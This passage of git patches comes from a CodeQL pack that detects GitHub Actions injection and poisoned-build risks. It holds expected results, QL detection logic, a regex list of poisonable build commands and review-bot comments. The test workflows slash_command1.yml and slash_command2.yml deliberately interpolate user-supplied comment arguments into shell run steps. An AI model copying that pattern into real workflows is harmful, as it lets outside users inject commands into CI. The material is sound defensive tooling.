venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip 
install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | -| 
.github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:9:24:43 | .github/workflows/poisonable_steps.yml@24:9:24:43 | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:14:24:42 | .github/workflows/poisonable_steps.yml@24:14:24:42 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | 
.github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -868,7 +887,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | 
@@ -892,6 +911,7 @@ sources | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | @@ -902,7 +922,6 @@ sources | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | @@ -992,6 +1011,7 @@ summaries | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml new file mode 100644 index 00000000000..adca4bc90ff --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + + - run: echo "${{ steps.command.outputs.command-arguments }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml new file mode 100644 index 00000000000..5422ac4e987 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + permission-level: read + + - run: echo "${{ steps.command.outputs.command-arguments }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 16119dd6453..6dfb91f7275 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
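Review bot: Neither slash_command1.yml nor slash_command2.yml says which outcome it pins, and the two fixtures differ only in the `permission-level: read` line of the second. Judging by the CodeInjection `.expected` rows added in this patch, only slash_command2.yml is meant to be reported. A header comment in each file would make that explicit, for example `# no alert expected: permission-level defaults to write` in slash_command1.yml and `# alert expected: permission-level read is not treated as a control check` in slash_command2.yml.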
@@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | 
@@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
@@ -357,6 +360,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d0834f0dff8..11036e7f8eb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | 
@@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | From a368b797fd1c2f6e9e1e8ab1b2978570267eb584 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:22 +0200 Subject: [PATCH 0385/1267] fix(checks): Add repository control checks --- .../codeql/actions/security/ControlChecks.qll | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index ec7e0ad0598..90a989c1a16 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -77,7 +77,6 @@ abstract class PermissionCheck extends ControlCheck { override boolean protectsAgainstRefMutationAttacks() { result = true } } - abstract class LabelCheck extends ControlCheck { // does it protect injection attacks but not pwn requests? // pwn requests are susceptible to checkout of mutable code 
@@ -108,7 +107,6 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { } /* Specific implementations of control checks */ - class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') @@ -143,7 +141,14 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) ) } } @@ -174,6 +179,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { this.getCallee() = "lannonbr/repo-permission-check-action" and - not this.getArgument("permission") = ["write", "admin"] + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "xt0rted/slash-command-action" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("permission-level") = ["write", "admin"] + ) } } From 59fd8530a33c914334f488b641458131b10ff6cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:58 +0200 Subject: [PATCH 0386/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
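Review bot: The widened pattern list in `RepositoryIfCheck` only tests whether the condition mentions one of these contexts, so a guard with the opposite polarity, such as `github.event.pull_request.head.repo.full_name != github.repository`, would presumably be counted as a repository check even though it selects fork pull requests. `normalizeExpr` and the rest of the class are outside the hunk, so this is inferred from the `regexpFind` call alone. Consider requiring an `==` comparison in the matched expression, or at least stating the limitation next to the list, e.g. `// NOTE: matches any mention of the context; the comparison operator is not checked`. Separately, the owner of a repository object in these event payloads is, as far as I know, exposed as `owner.login`, so the two `owner\\.name` patterns may never match and are worth confirming against a real payload.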
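Review bot: The characteristic predicate of `PermissionActionCheck` now chains `and` and `or` across two callees with no parentheses around the first disjunct and no comment on it, which makes the polarity this commit corrects easy to misread on the next edit. Wrapping each callee's conditions in its own parenthesised group and adding a line such as `// only a write/admin requirement counts as a permission check` above the `lannonbr/repo-permission-check-action` branch would match the comment already given for the slash-command default. The literal comparison presumably also means that a `permission` or `permission-level` value supplied through a `${{ }}` expression is not recognised; if that is intended, the comment should say so.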
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dd99208f5e3..554ef6bbe7f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.14 +version: 0.1.15 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe02dad9c55..e72b14fb358 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.14 +version: 0.1.15 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8231261ccfa8bd02c43567d51739258de74af09c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 9 Jul 2024 17:28:04 +0200 Subject: [PATCH 0387/1267] New poisonable steps --- .../actions/security/PoisonableSteps.qll | 8 +- ql/lib/ext/config/poisonable_steps.yml | 54 +-- .../.github/workflows/poisonable_steps.yml | 11 + .../library-tests/poisonable_steps.expected | 12 +- ql/test/library-tests/test.expected | 307 +++++++++++++----- 5 files changed, 283 insertions(+), 109 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index e22662c64db..34246fa4e8f 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,12 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _)) + exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) + ) ) } } 
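Review bot: The new terminator group in `PoisonableCommandStep` accepts `[a-zA-Z]` and `-` after the command pattern, so together with the leading `\\b` a short data-model entry matches as the prefix of a longer word; with the trailing spaces removed from the entries in `poisonable_steps.yml` in this same commit, `ant` would match inside `antlr` and `make` inside `makefile`. The letter alternative looks like it exists only for entries that end mid-word, such as `(p)?npm\\s+[a-z]`. I would drop `[a-zA-Z]` (and probably `-`) from the shared suffix and let such entries carry their own tail, e.g. `(p)?npm\\s+[a-z]+`, so the suffix stays a real command boundary. The enclosing class starts outside the hunk.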
@@ -41,7 +46,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", group) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 56ba567aa45..f9274f54872 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -2,7 +2,6 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableActionsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 # source: https://boostsecurityio.github.io/lotp/ data: - ["pre-commit/action"] 
@@ -14,40 +13,46 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 # source: https://boostsecurityio.github.io/lotp/ data: - - ["ant "] - - ["bundle "] - - ["cargo "] - - ["checkov "] - - ["eslint "] - - ["go generate"] - - ["go run"] - - ["gomplate "] - - ["gradle "] - - ["java -jar"] - - ["make "] + - ["ant"] + - ["awk\\s+-f"] + - ["bundle"] + - ["cargo"] + - ["checkov"] + - ["eslint"] + - ["gcloud\\s+builds submit"] + - ["golangci-lint"] + - ["gomplate"] + - ["goreleaser"] + - ["gradle"] + - ["java\\s+-jar"] + - ["make"] + - ["mdformat"] - ["mkdocs"] - ["msbuild"] - ["mvn"] - ["mypy"] - - ["npm [a-z]"] - - ["pnpm [a-z]"] + - ["(p)?npm\\s+[a-z]"] - ["pre-commit"] - ["prettier"] - - ["pip install -r"] - - ["pip install --requirement"] + - ["phpstan"] + - ["pip\\s+install\\s+-r"] + - ["pip\\s+install\\s+--requirement"] - ["poetry"] - ["pylint"] - ["pytest"] - - ["rake "] - - ["rails db:create"] - - ["rails assets:precompile"] - - ["rubocop "] - - ["terraform "] + - ["rake"] + - ["rails\\s+db:create"] + - ["rails\\s+assets:precompile"] + - ["rubocop"] + - ["sed\\s+-e"] + - ["sed\\s+-f"] + - ["stylelint"] + - ["terraform"] - ["tflint"] - - ["yarn "] + - ["yarn"] + - ["webpack"] - addsTo: pack: github/actions-all extensible: poisonableLocalScriptsDataModel @@ -59,5 +64,6 @@ extensions: - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - ["(python)\\s+(.*)\\.py", 3] - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(.*)\\.go", 3] + - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] + - ["(dotnet)\\s+(.*)\\.csproj", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 7be32ca5c17..37ec9c9ff71 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml 
